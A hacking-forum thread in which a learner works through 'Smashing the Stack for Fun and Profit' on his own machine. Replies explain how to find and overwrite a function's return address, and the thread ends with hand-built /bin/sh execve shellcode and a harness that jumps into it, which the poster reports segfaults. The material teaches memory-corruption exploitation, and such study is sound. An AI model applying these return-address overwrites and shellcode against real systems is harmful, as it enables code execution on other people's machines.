The Case of the Phantom Return Address Pointer
Hello HBH. Disclaimer: this is all being done on my own personal Linux box, so no laws are being violated or anything like that. On that note, if anyone has any questions about my box, I can go into more detail.
I need some help. I've been following along with the example C code in "Smashing the Stack for Fun and Profit" on my (yes, MY) Linux box. It's a 64-bit AMD processor running Ubuntu 10.10 (Maverick). I got to the third example in the paper and got hung up. Here's my code.
#include <stdio.h>
void function(int a, int b, int c)
{
    char buffer1[5];
    char buffer2[10];
    int *ret;
    ret = buffer1 + 24;
    //printf("0x%x\n", *ret);
    (*ret) += 8;
    __asm__("jmp .L3");
}
void main()
{
    int x;
    x = 0;
    function(1, 2, 3);
    x = 1;
    printf("%d\n", x);
}
The concept is simple. The code calls function(), which allocates buffer1 and buffer2. buffer1 is word-aligned to 8 bytes on the stack; above it sit the saved frame pointer (the previous EBP) and the return address, which comes to 12 bytes total, or 24 bytes (correct me if I'm wrong) since I'm on a 64-bit machine. The code starts at the address of buffer1 and adds 24, which should land on the return address. It then adds 8 to the return address in hopes of skipping over the "x = 1;" assignment in main(). The inline assembly jumps over the code the compiler adds to check that the stack hasn't been smashed (see below). Two looks at the assembly follow.
Here's the result of calling gcc -S example3.c -o example3.s
.file "example3.c"
.text
.globl function
.type function, @function
function:
pushl %ebp
movl %esp, %ebp
subl $40, %esp
movl %gs:20, %eax
movl %eax, -12(%ebp)
xorl %eax, %eax
leal -33(%ebp), %eax
addl $24, %eax
movl %eax, -28(%ebp)
movl -28(%ebp), %eax
movl (%eax), %eax
leal 8(%eax), %edx
movl -28(%ebp), %eax
movl %edx, (%eax)
#APP
# 14 "example3.c" 1
jmp .L3
# 0 "" 2
#NO_APP
movl -12(%ebp), %eax
xorl %gs:20, %eax
je .L3
call __stack_chk_fail
.L3:
leave
ret
.size function, .-function
.section .rodata
.LC0:
.string "%d\n"
.text
.globl main
.type main, @function
main:
pushl %ebp
movl %esp, %ebp
andl $-16, %esp
subl $32, %esp
movl $0, 28(%esp)
movl $3, 8(%esp)
movl $2, 4(%esp)
movl $1, (%esp)
call function
movl $1, 28(%esp)
movl $.LC0, %eax
movl 28(%esp), %edx
movl %edx, 4(%esp)
movl %eax, (%esp)
call printf
leave
ret
.size main, .-main
.ident "GCC: (Ubuntu/Linaro 4.4.4-14ubuntu5) 4.4.5"
.section .note.GNU-stack,"",@progbits
and a look at the main function from gdb:
(gdb) disassemble main
Dump of assembler code for function main:
0x08048457 <+0>: push %ebp
0x08048458 <+1>: mov %esp,%ebp
0x0804845a <+3>: and $0xfffffff0,%esp
0x0804845d <+6>: sub $0x20,%esp
0x08048460 <+9>: movl $0x0,0x1c(%esp)
0x08048468 <+17>: movl $0x3,0x8(%esp)
0x08048470 <+25>: movl $0x2,0x4(%esp)
0x08048478 <+33>: movl $0x1,(%esp)
0x0804847f <+40>: call 0x8048414 <function>
0x08048484 <+45>: movl $0x1,0x1c(%esp)
0x0804848c <+53>: mov $0x8048570,%eax
0x08048491 <+58>: mov 0x1c(%esp),%edx
0x08048495 <+62>: mov %edx,0x4(%esp)
0x08048499 <+66>: mov %eax,(%esp)
0x0804849c <+69>: call 0x8048338 <printf@plt>
0x080484a1 <+74>: leave
0x080484a2 <+75>: ret
End of assembler dump.
We can see from gdb that 8 bytes is indeed the magic number to skip from <+45> to <+53>.
So it all looks good, right? Wrong! The code doesn't work. It runs fine, but x always winds up being set to 1, even though I'm screwing around with the stack. So maybe the ret = buffer1 + 24; line is wrong. Well, I tried every value from ret = buffer1 + 0; all the way to ret = buffer1 + 33;, incrementing by 1 and recompiling every time. At buffer1 + 33 I get a seg fault, leading me to believe I've overshot the return address. So what gives? The way I see it, at some offset either x should not get set to 1, or I should have corrupted the stack and gotten undefined behavior, but neither happened for any value I added to buffer1. So I'm at a loss. Where the heck is the return address? What's going wrong? Someone please smash my stack!
Are you sure you're running on a 64-bit system?
Did you generate this assembly code with gdb yourself or is it from somewhere else?
(gdb) disassemble main
Dump of assembler code for function main:
0x08048457 <+0>: push %ebp
0x08048458 <+1>: mov %esp,%ebp
0x0804845a <+3>: and $0xfffffff0,%esp
0x0804845d <+6>: sub $0x20,%esp
0x08048460 <+9>: movl $0x0,0x1c(%esp)
0x08048468 <+17>: movl $0x3,0x8(%esp)
0x08048470 <+25>: movl $0x2,0x4(%esp)
0x08048478 <+33>: movl $0x1,(%esp)
0x0804847f <+40>: call 0x8048414 <function>
0x08048484 <+45>: movl $0x1,0x1c(%esp)
0x0804848c <+53>: mov $0x8048570,%eax
0x08048491 <+58>: mov 0x1c(%esp),%edx
0x08048495 <+62>: mov %edx,0x4(%esp)
0x08048499 <+66>: mov %eax,(%esp)
0x0804849c <+69>: call 0x8048338 <printf@plt>
0x080484a1 <+74>: leave
0x080484a2 <+75>: ret
End of assembler dump.
I thought the registers on 64-bit AMD processors were RSP and RBP, not ESP and EBP, which are used in 32-bit x86 processors (maybe others as well).
My machine is definitely 64-bit. Whether or not it compiled as 64-bit is a different story. You might be right about the registers being 32-bit. I'll have to verify on my end. All the code shown, including the gdb output, is my own (but example3.c is a very minor modification of the code in Aleph One's paper, of course). I think I forgot to mention my compile line:
gcc -g1 example3.c -o example3
I'm going to play with
gcc example3.c -o example3 -fno-stack-protector
tonight, although I'd still like to figure this out so it works even without -fno-stack-protector. I'll have to investigate what exactly the stack protector does.
It might be more of a question for Google, but the xorl %gs:20, %eax looks suspicious. I'm not really sure what the %gs register is or how the : works, so I'll just have to pore over AMD's (hueg) documentation.
Thanks for the help! I'll get on it tonight and post updates.
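For anyone wondering what the stack protector check amounts to: going by the gcc -S listing, the prologue of function() copies a value from %gs:20 into -12(%ebp), and the epilogue XORs that slot against %gs:20 again and calls __stack_chk_fail if the two differ. Below is a minimal sketch of the same idea in plain C. The names (struct fake_frame, GUARD_VALUE, guard_survives) are made up for illustration, and the struct only imitates a frame; it is not how gcc actually lays things out.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for a stack frame: a small buffer with a guard
 * word placed right after it, the way the guard slot sits between the
 * locals and the saved EBP / return address. */
struct fake_frame {
    char buffer[8];
    unsigned long guard;
};

/* Arbitrary illustrative value; not the value a real process uses. */
#define GUARD_VALUE 0x5a5a5a5aUL

/* Copy n bytes of src over the start of the fake frame (n is clamped to
 * the size of the struct so the sketch itself stays in bounds), then
 * report whether the guard word is still intact: 1 = intact, 0 = smashed. */
int guard_survives(const char *src, size_t n)
{
    struct fake_frame frame;

    memset(&frame, 0, sizeof frame);
    frame.guard = GUARD_VALUE;          /* "prologue": plant the guard */

    if (n > sizeof frame)
        n = sizeof frame;
    memcpy(&frame, src, n);             /* linear write starting at buffer */

    return frame.guard == GUARD_VALUE;  /* "epilogue": check the guard */
}
```

A copy that stays inside the 8-byte buffer leaves the guard alone, while one that runs over the whole struct changes it. A check like this only notices writes that pass through the guard slot; a write aimed directly at one computed address, as in example3.c, would go unnoticed unless that address happened to be the guard itself.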
I've managed to get that example working on 32 bit and 64 bit (virtual) machines.
32 bit (with gcc 4.4.5):
ret = buffer1 + 37;
(*ret) += 8;
64 bit (with gcc 4.5.2):
ret = buffer1 + 24;
(*ret) += 7;
Would you be able to try them both out? If one works for you I can tell you where I got those numbers from.
Also, you say you're using Ubuntu 10.10. The default download on their site is the 32-bit version. You could be running that on 64-bit hardware, in which case I'd guess you'd be producing 32-bit code (though I'm not sure).
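A quick way to settle what the compiler is actually targeting, independent of the hardware, is to ask the compiled program itself. This is only a minimal sketch, and target_bits is a made-up helper name:

```c
#include <limits.h>

/* Width in bits of a pointer in the binary this file is compiled into.
 * A build targeting 32-bit x86 gives 32; an x86-64 build gives 64. */
int target_bits(void)
{
    return (int)(sizeof(void *) * CHAR_BIT);
}
```

Printing target_bits() from main() and building with the same gcc command line as example3.c shows which kind of code that command produces. The 8-hex-digit addresses and the %esp/%ebp registers in the gdb dump point the same way.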
MercuryTW wrote: gcc -g1 example3.c -o example3
Why not use -g instead of -g1? As far as I know, -g1 just includes less debugging information. I'm sure you're not having problems with the file size of this example.
MercuryTW wrote: It might be more of a question for Google, but the xorl %gs:20, %eax looks suspicious. I'm not really sure what the %gs register is or how the : works, so I'll just have to pore over AMD's (hueg) documentation.
Sorry, I don't know what the %gs register is for either.
EDIT: Added GCC versions used
I'll have to check out that code as soon as I get home. As for using -g and -g1, I'm actually slightly worried about what the -gX flags are doing exactly. There's the possibility that the debugging output is placing mysterious stuff in my assembly that could be screwing up my logic. Since I'm quite unfortunately unfamiliar with gdb (print statement debugging all the way =P), I'm only using gdb to verify the offset by which I have to modify the return address (via (gdb) disassemble main). So I'm not really all that worried about the level of debug info generated, although I'm sure I'd benefit from what gdb can do if I sat down and learned the #^%~ thing.
starofale, you're amazing. According to your logic, I am indeed compiling into 32 bits. I tried
ret = buffer1 + 37;
(*ret) += 8;
and it worked like a charm, first try. Interestingly enough, I was even able to take out the asm("jmp .L3"); line, and it still worked. Stack protector my ass.
The compilation line was gcc example3.c -o example3
So where did you wind up getting the 37 from?
Layout of the stack:
This is for a 32-bit processor. A 64-bit stack is pretty much the same; you just need to use RSP and RBP instead of ESP and EBP.
Step 1 - Find location of return address
To be able to change the return address, you first need to find out where it is stored relative to buffer1.
You will need to compile your program with debugging information included for this to work.
In GDB, set a breakpoint in function() (break function) and run the program (run).
Get the address of buffer1 by typing: print &buffer1 (I'll call this value x)
Get the address held in EBP with: print /x $ebp (I'll call this value y)
The return address is stored 4 bytes after the location EBP points to (8 on a 64-bit system),
i.e. location of return address = y+4
Let z be the difference between the locations of the return address and buffer1: z = y+4 - x
Convert z to decimal and then replace the following line in your code with the result:
ret = buffer1 + z;
(Put in the value of z directly - not as a variable)
On my computer I got:
x = print &buffer1 = 0xbffff397
y = print /x $ebp = 0xbffff3b8
z = y+4 - x = 25 (in hex) = 37 (in decimal)
ret = buffer1 + 37;
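The arithmetic in Step 1 can be written down as a small helper, which makes it easy to redo with your own gdb values. This is just a sketch; ret_offset and its parameter names are made up here, and word_size is the size of the saved frame pointer (4 on 32-bit x86, 8 on x86-64).

```c
#include <stdint.h>

/* Offset from the start of buffer1 to the saved return address.
 * buf_addr:  value of "print &buffer1" (x in the steps above)
 * ebp_addr:  value of "print /x $ebp"  (y in the steps above)
 * word_size: 4 on 32-bit x86, 8 on x86-64 */
long ret_offset(uintptr_t buf_addr, uintptr_t ebp_addr, unsigned word_size)
{
    return (long)(ebp_addr + word_size - buf_addr);
}
```

With the values above, ret_offset(0xbffff397, 0xbffff3b8, 4) gives 37. The gcc -S listing earlier in the thread agrees: buffer1 is addressed as -33(%ebp), and 33 + 4 = 37.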
Step 2 - Change return address
Next you need to find out what to set the return address to. You want to skip the instruction that assigns 1 to x. In GDB when you disassembled main() you got:
...
0x0804847f <+40>: call 0x8048414 <function>
0x08048484 <+45>: movl $0x1,0x1c(%esp)
0x0804848c <+53>: mov $0x8048570,%eax
...
The instruction at +40 calls function(), and the default return address points to the next instruction (+45). However, it is this instruction at +45 that sets x to 1, so we want to skip it by setting the return address to the instruction at +53 (2 instructions after the function call).
In this case, the difference between the default return address and your desired return address is 53 - 45 = 8, so write:
(*ret) += 8;
Then your program ends up as:
#include <stdio.h>
void function(int a, int b, int c)
{
    char buffer1[5];
    char buffer2[10];
    int *ret;
    ret = buffer1 + 37;
    (*ret) += 8;
}
void main()
{
    int x;
    x = 0;
    function(1, 2, 3);
    x = 1;
    printf("%d\n", x);
}
And just when I thought I was finally making progress…
The next step in the tutorial is disassembling the following code to understand how execve works.
#include <stdio.h>
#include <unistd.h> /* declares execve() */
void main()
{
    char * name[2];
    name[0] = "/bin/sh";
    name[1] = 0;
    execve(name[0], name, 0);
}
The main function is just the same as in the tutorial, but the assembly behind execve differs significantly from the tutorial. I tried looking into the issue on Google, but all I really found was a bunch of prepackaged shellcode, nothing that really explains this system call. In hopes of avoiding being doomed to script kiddie-dom, I'd like to actually understand what's going on in execve. Here's the gdb disassembly from gcc -g -static shellcode.c -o shellcode -fno-stack-protector
Dump of assembler code for function main:
0x080482c0 <+0>: push %ebp
0x080482c1 <+1>: mov %esp,%ebp
0x080482c3 <+3>: and $0xfffffff0,%esp
0x080482c6 <+6>: sub $0x20,%esp // End of prologue; allocate 32 bytes
0x080482c9 <+9>: movl $0x80ae728,0x18(%esp) // Store the address of the "/bin/sh" string on the stack at ESP + 24 (name[0])
0x080482d1 <+17>: movl $0x0,0x1c(%esp) // Store NULL on the stack at ESP + 28 (name[1])
0x080482d9 <+25>: mov 0x18(%esp),%eax // Load name[0], the address of the "/bin/sh" string, into EAX
0x080482dd <+29>: movl $0x0,0x8(%esp) // Store NULL on the stack at ESP + 8 (third argument)
0x080482e5 <+37>: lea 0x18(%esp),%edx // Load the effective address of the name[] array into EDX
0x080482e9 <+41>: mov %edx,0x4(%esp) // Store the address of the name[] array (from EDX) at ESP + 4 (second argument)
0x080482ed <+45>: mov %eax,(%esp) // Store the address of the "/bin/sh" string (from EAX) at ESP (first argument)
0x080482f0 <+48>: call 0x8052ef0 <execve> // Call execve, pushing the return address onto the stack
0x080482f5 <+53>: leave
0x080482f6 <+54>: ret
End of assembler dump.
Dump of assembler code for function execve:
0x08052ef0 <+0>: push %ebp // Save the caller's EBP on the stack
0x08052ef1 <+1>: mov %esp,%ebp // Set EBP to ESP
0x08052ef3 <+3>: mov 0x10(%ebp),%edx // Load the third argument, NULL (at EBP + 16), into EDX
0x08052ef6 <+6>: push %ebx // Push EBX onto the stack --??? this probably preserves it so it can be restored at <+31>
0x08052ef7 <+7>: mov 0xc(%ebp),%ecx // Load the second argument, the address of name[] (at EBP + 12), into ECX
0x08052efa <+10>: mov 0x8(%ebp),%ebx // Load the first argument, the address of "/bin/sh" (at EBP + 8), into EBX
0x08052efd <+13>: mov $0xb,%eax // Move 11 into EAX. 11 is the index of execve in the syscall table
0x08052f02 <+18>: call *0x80ce088 // Perform the system call? maybe?
0x08052f08 <+24>: cmp $0xfffff000,%eax // Compare EAX with the constant 0xfffff000
0x08052f0d <+29>: ja 0x8052f12 <execve+34> // If EAX is above 0xfffff000 (unsigned compare), jump down
0x08052f0f <+31>: pop %ebx // Pop top of stack to EBX
0x08052f10 <+32>: pop %ebp // Pop top of stack to EBP
0x08052f11 <+33>: ret
0x08052f12 <+34>: mov $0xffffffe8,%edx // Move this value (-24 as a signed number) into EDX
0x08052f18 <+40>: neg %eax // Take the two's complement of EAX
0x08052f1a <+42>: mov %gs:0x0,%ecx // Take the first longword out of the GS segment and put it in ECX
0x08052f21 <+49>: mov %eax,(%ecx,%edx,1) // Store EAX at address ECX + EDX; fuck if I know what's going on here
0x08052f24 <+52>: or $0xffffffff,%eax // OR EAX with 0xffffffff, which sets EAX to -1
0x08052f27 <+55>: jmp 0x8052f0f <execve+31> // Jump back up
End of assembler dump.
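The tail of execve (from <+24> on) reads like ordinary error handling once it is written in C. The sketch below is an interpretation, not the library's source: it assumes the Linux convention that a raw kernel return value in the range -4095..-1 is a negated error code, and it assumes the store at <+49> is writing that code into the thread's errno. finish_syscall is a made-up name.

```c
#include <errno.h>

/* Turn a raw kernel return value into the C-level convention.
 * Assumption: a raw value above (unsigned)-4096, i.e. -4095..-1 when
 * read as signed, is a negated errno code; anything else is a normal
 * result and is passed through unchanged. */
long finish_syscall(unsigned long raw)
{
    if (raw > (unsigned long)-4096L) {   /* cmp $0xfffff000,%eax ; ja   */
        errno = (int)(0UL - raw);        /* neg %eax ; store the code   */
        return -1;                       /* or $0xffffffff,%eax         */
    }
    return (long)raw;                    /* pop %ebx ; pop %ebp ; ret   */
}
```

Read this way, execve returns -1 with errno set when the kernel reports failure, and otherwise hands back whatever the kernel returned.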
Things make sense down to the call line (<+18>). The tutorial says that far calls are sometimes used to make a system call, but that doesn't really make sense, since AMD does have the SYSCALL instruction for doing system calls. I tried investigating what's at 0x80ce088 (from the call line), but it's just more and more inscrutable instructions. So what the heelllll is going on in this execve call? Or if someone could at least tell me how I should approach this issue, I'd be very grateful.
MercuryTW wrote: It says in the tutorial that sometimes far calls are used to do a system call, but that doesn't really make sense since AMD does have the instruction SYSCALL for doing system calls.
The syscall instruction is for 64-bit systems. 32-bit x86 systems use 'int 0x80' to trigger system calls.
MercuryTW wrote: I tried investigating what's going on at 0x80ce088 (from the call line), but its just more and more inscrutable instructions.
The system call has to be buried somewhere in there. If you can't understand any of the code you could post it here.
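If the goal is to see "system call by number" without reading the library's disassembly, the C library's syscall() function does the register loading and the trap for you. Here is a minimal, Linux-only sketch using a harmless call (getpid) instead of execve; raw_getpid is a made-up name, and it assumes a C library that provides syscall() and the SYS_ constants.

```c
#define _GNU_SOURCE
#include <sys/syscall.h>
#include <unistd.h>

/* Ask the kernel for our process ID by system call number rather than
 * through the getpid() wrapper. syscall() puts the number and arguments
 * in registers and enters the kernel using whatever mechanism the C
 * library uses on this architecture. */
long raw_getpid(void)
{
    return syscall(SYS_getpid);
}
```

The SYS_ constants are used because the numbers differ between architectures: execve is 11 on 32-bit x86, as the mov $0xb,%eax above shows, but 59 on x86-64.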
Here's the code that's found on the other end of the far call
If anyone would like to see more of it, I can post another link with more disassembly. The code seems really bizarre. The only thing I can think of is that this is part of the assembly from sh, the program I'm trying to exec.
Ok, so ignoring my last post, I'm stuck again. I have a small shellcode tester that doesn't seem to be working. Here's the general idea of what I'm trying to do:
Syntax: string_addr_addr refers to the address in memory where the string's address is stored,
i.e., if we put the string address at location $0x123, then string_addr_addr = $0x123
movl string_addr, string_addr_addr # take the address of our string, and put it in memory
movb $0x0, null_byte_addr # put a null byte in memory to terminate the string
movl $0x0, null_addr # take a null (32b), and put it in memory
mov $0xb, %eax # put 11 (0xb), the execve system call number, into EAX
mov string_addr, %ebx # take the address of the string, and put it into the EBX register
lea string_addr_addr, %ecx # take the addr of the addr of the string and put it into the ECX register
lea null_addr, %edx # take the address of the null we stored and put it into the EDX register
int $0x80 # perform system call
mov $0x1, %eax # move exit syscall into the eax register
mov $0x0, %ebx # move exit status into the ebx register
int $0x80 # perform system call
(optional) hlt # halt operation
/bin/sh string goes here
Closer to the real thing:
jmp offset-to-call # jump to CALL
pop %esi # snag the string's address (put on the stack by CALL)
mov %esi, array-offset(%esi) # store the string_addr
movb $0x0, nullbyteoffset(%esi) # put the null byte at the end of the string
movl $0x0, null-offset(%esi) # store the null (32b)
mov $0xb, %eax # execve system call number
mov %esi, %ebx # put the string address into EBX
lea array-offset(%esi), %ecx # put the addr of the addr of the string into ECX
lea null-offset(%esi), %edx # put the address of the null into EDX
int $0x80
mov $0x1, %eax
mov $0x0, %ebx
int $0x80
call offset-to-pop
.string "/bin/sh"
jmp 0x2f # 6 B
pop %esi # 1 B
mov %esi, 0x8(%esi) # 3 B
movb $0x0, 0x7(%esi) # 4 B
movl $0x0, 0xc(%esi) # 7 B
mov $0xb, %eax # 5 B
mov %esi, %ebx # 2 B
lea 0x8(%esi), %ecx # 3 B
lea 0xc(%esi), %edx # 3 B
int $0x80 # 2 B
mov $0x1, %eax # 5 B
mov $0x0, %ebx # 5 B
int $0x80 # 2 B
call -0x2a # 5 B
.string "/bin/sh"
and the corresponding C code for the test:
char shellcode[] = "\xe9\x93\x7c\xfb\xf7\x5e\x89\x76\x08\xc6\x46"
"\x07\x00\xc7\x46\x0c\x00\x00\x00\x00\xb8\x0b\x00\x00\x00\x89\xf3"
"\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00"
"\x00\x00\xcd\x80\xe8\x0b\x7c\xfb\xf7"
"\x2f\x62\x69\x6e\x2f\x73\x68\x00\x5d\xc3";
void main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
The problem is that it seg faults. I have no idea how to even begin debugging this. I'm about 95% certain that the CALL and JMP have the right relative addresses on them.
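One way to double-check the relative addresses is to recompute them from the per-instruction byte counts. On x86, a relative jmp or call displacement is measured from the end of the jumping instruction, so the jmp has to skip exactly the instructions between it and the call, and the call has to go back over those same instructions plus its own 5 bytes. The sketch below does that sum; the function names are made up, and the sizes are copied from the "# n B" annotations in the listing (pop through the second int $0x80).

```c
#include <stddef.h>

/* Sizes in bytes of the instructions between the jmp and the call,
 * taken from the annotated listing: pop, mov, movb, movl, mov, mov,
 * lea, lea, int, mov, mov, int. */
static const int body_sizes[] = { 1, 3, 4, 7, 5, 2, 3, 3, 2, 5, 5, 2 };

#define CALL_SIZE 5 /* one opcode byte plus a 32-bit displacement */

/* Total size of the instructions that sit between jmp and call. */
int body_length(void)
{
    int total = 0;
    for (size_t i = 0; i < sizeof body_sizes / sizeof body_sizes[0]; i++)
        total += body_sizes[i];
    return total;
}

/* jmp displacement: from the end of the jmp forward to the call. */
int jmp_displacement(void)
{
    return body_length();
}

/* call displacement: from the end of the call back to the pop. */
int call_displacement(void)
{
    return -(body_length() + CALL_SIZE);
}
```

By this count the jmp needs +0x2a and the call needs -0x2f, which is the reverse of the 0x2f / -0x2a pair in the listing, so that is one place worth re-checking. It may also be worth looking at whether the four bytes after \xe9 and \xe8 in shellcode[] actually encode displacements this small.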
Note that testsc.c was compiled with gcc testsc.c -o testsc -fno-stack-protector
If anyone could help point me in the right direction, that'd be great. Thanks.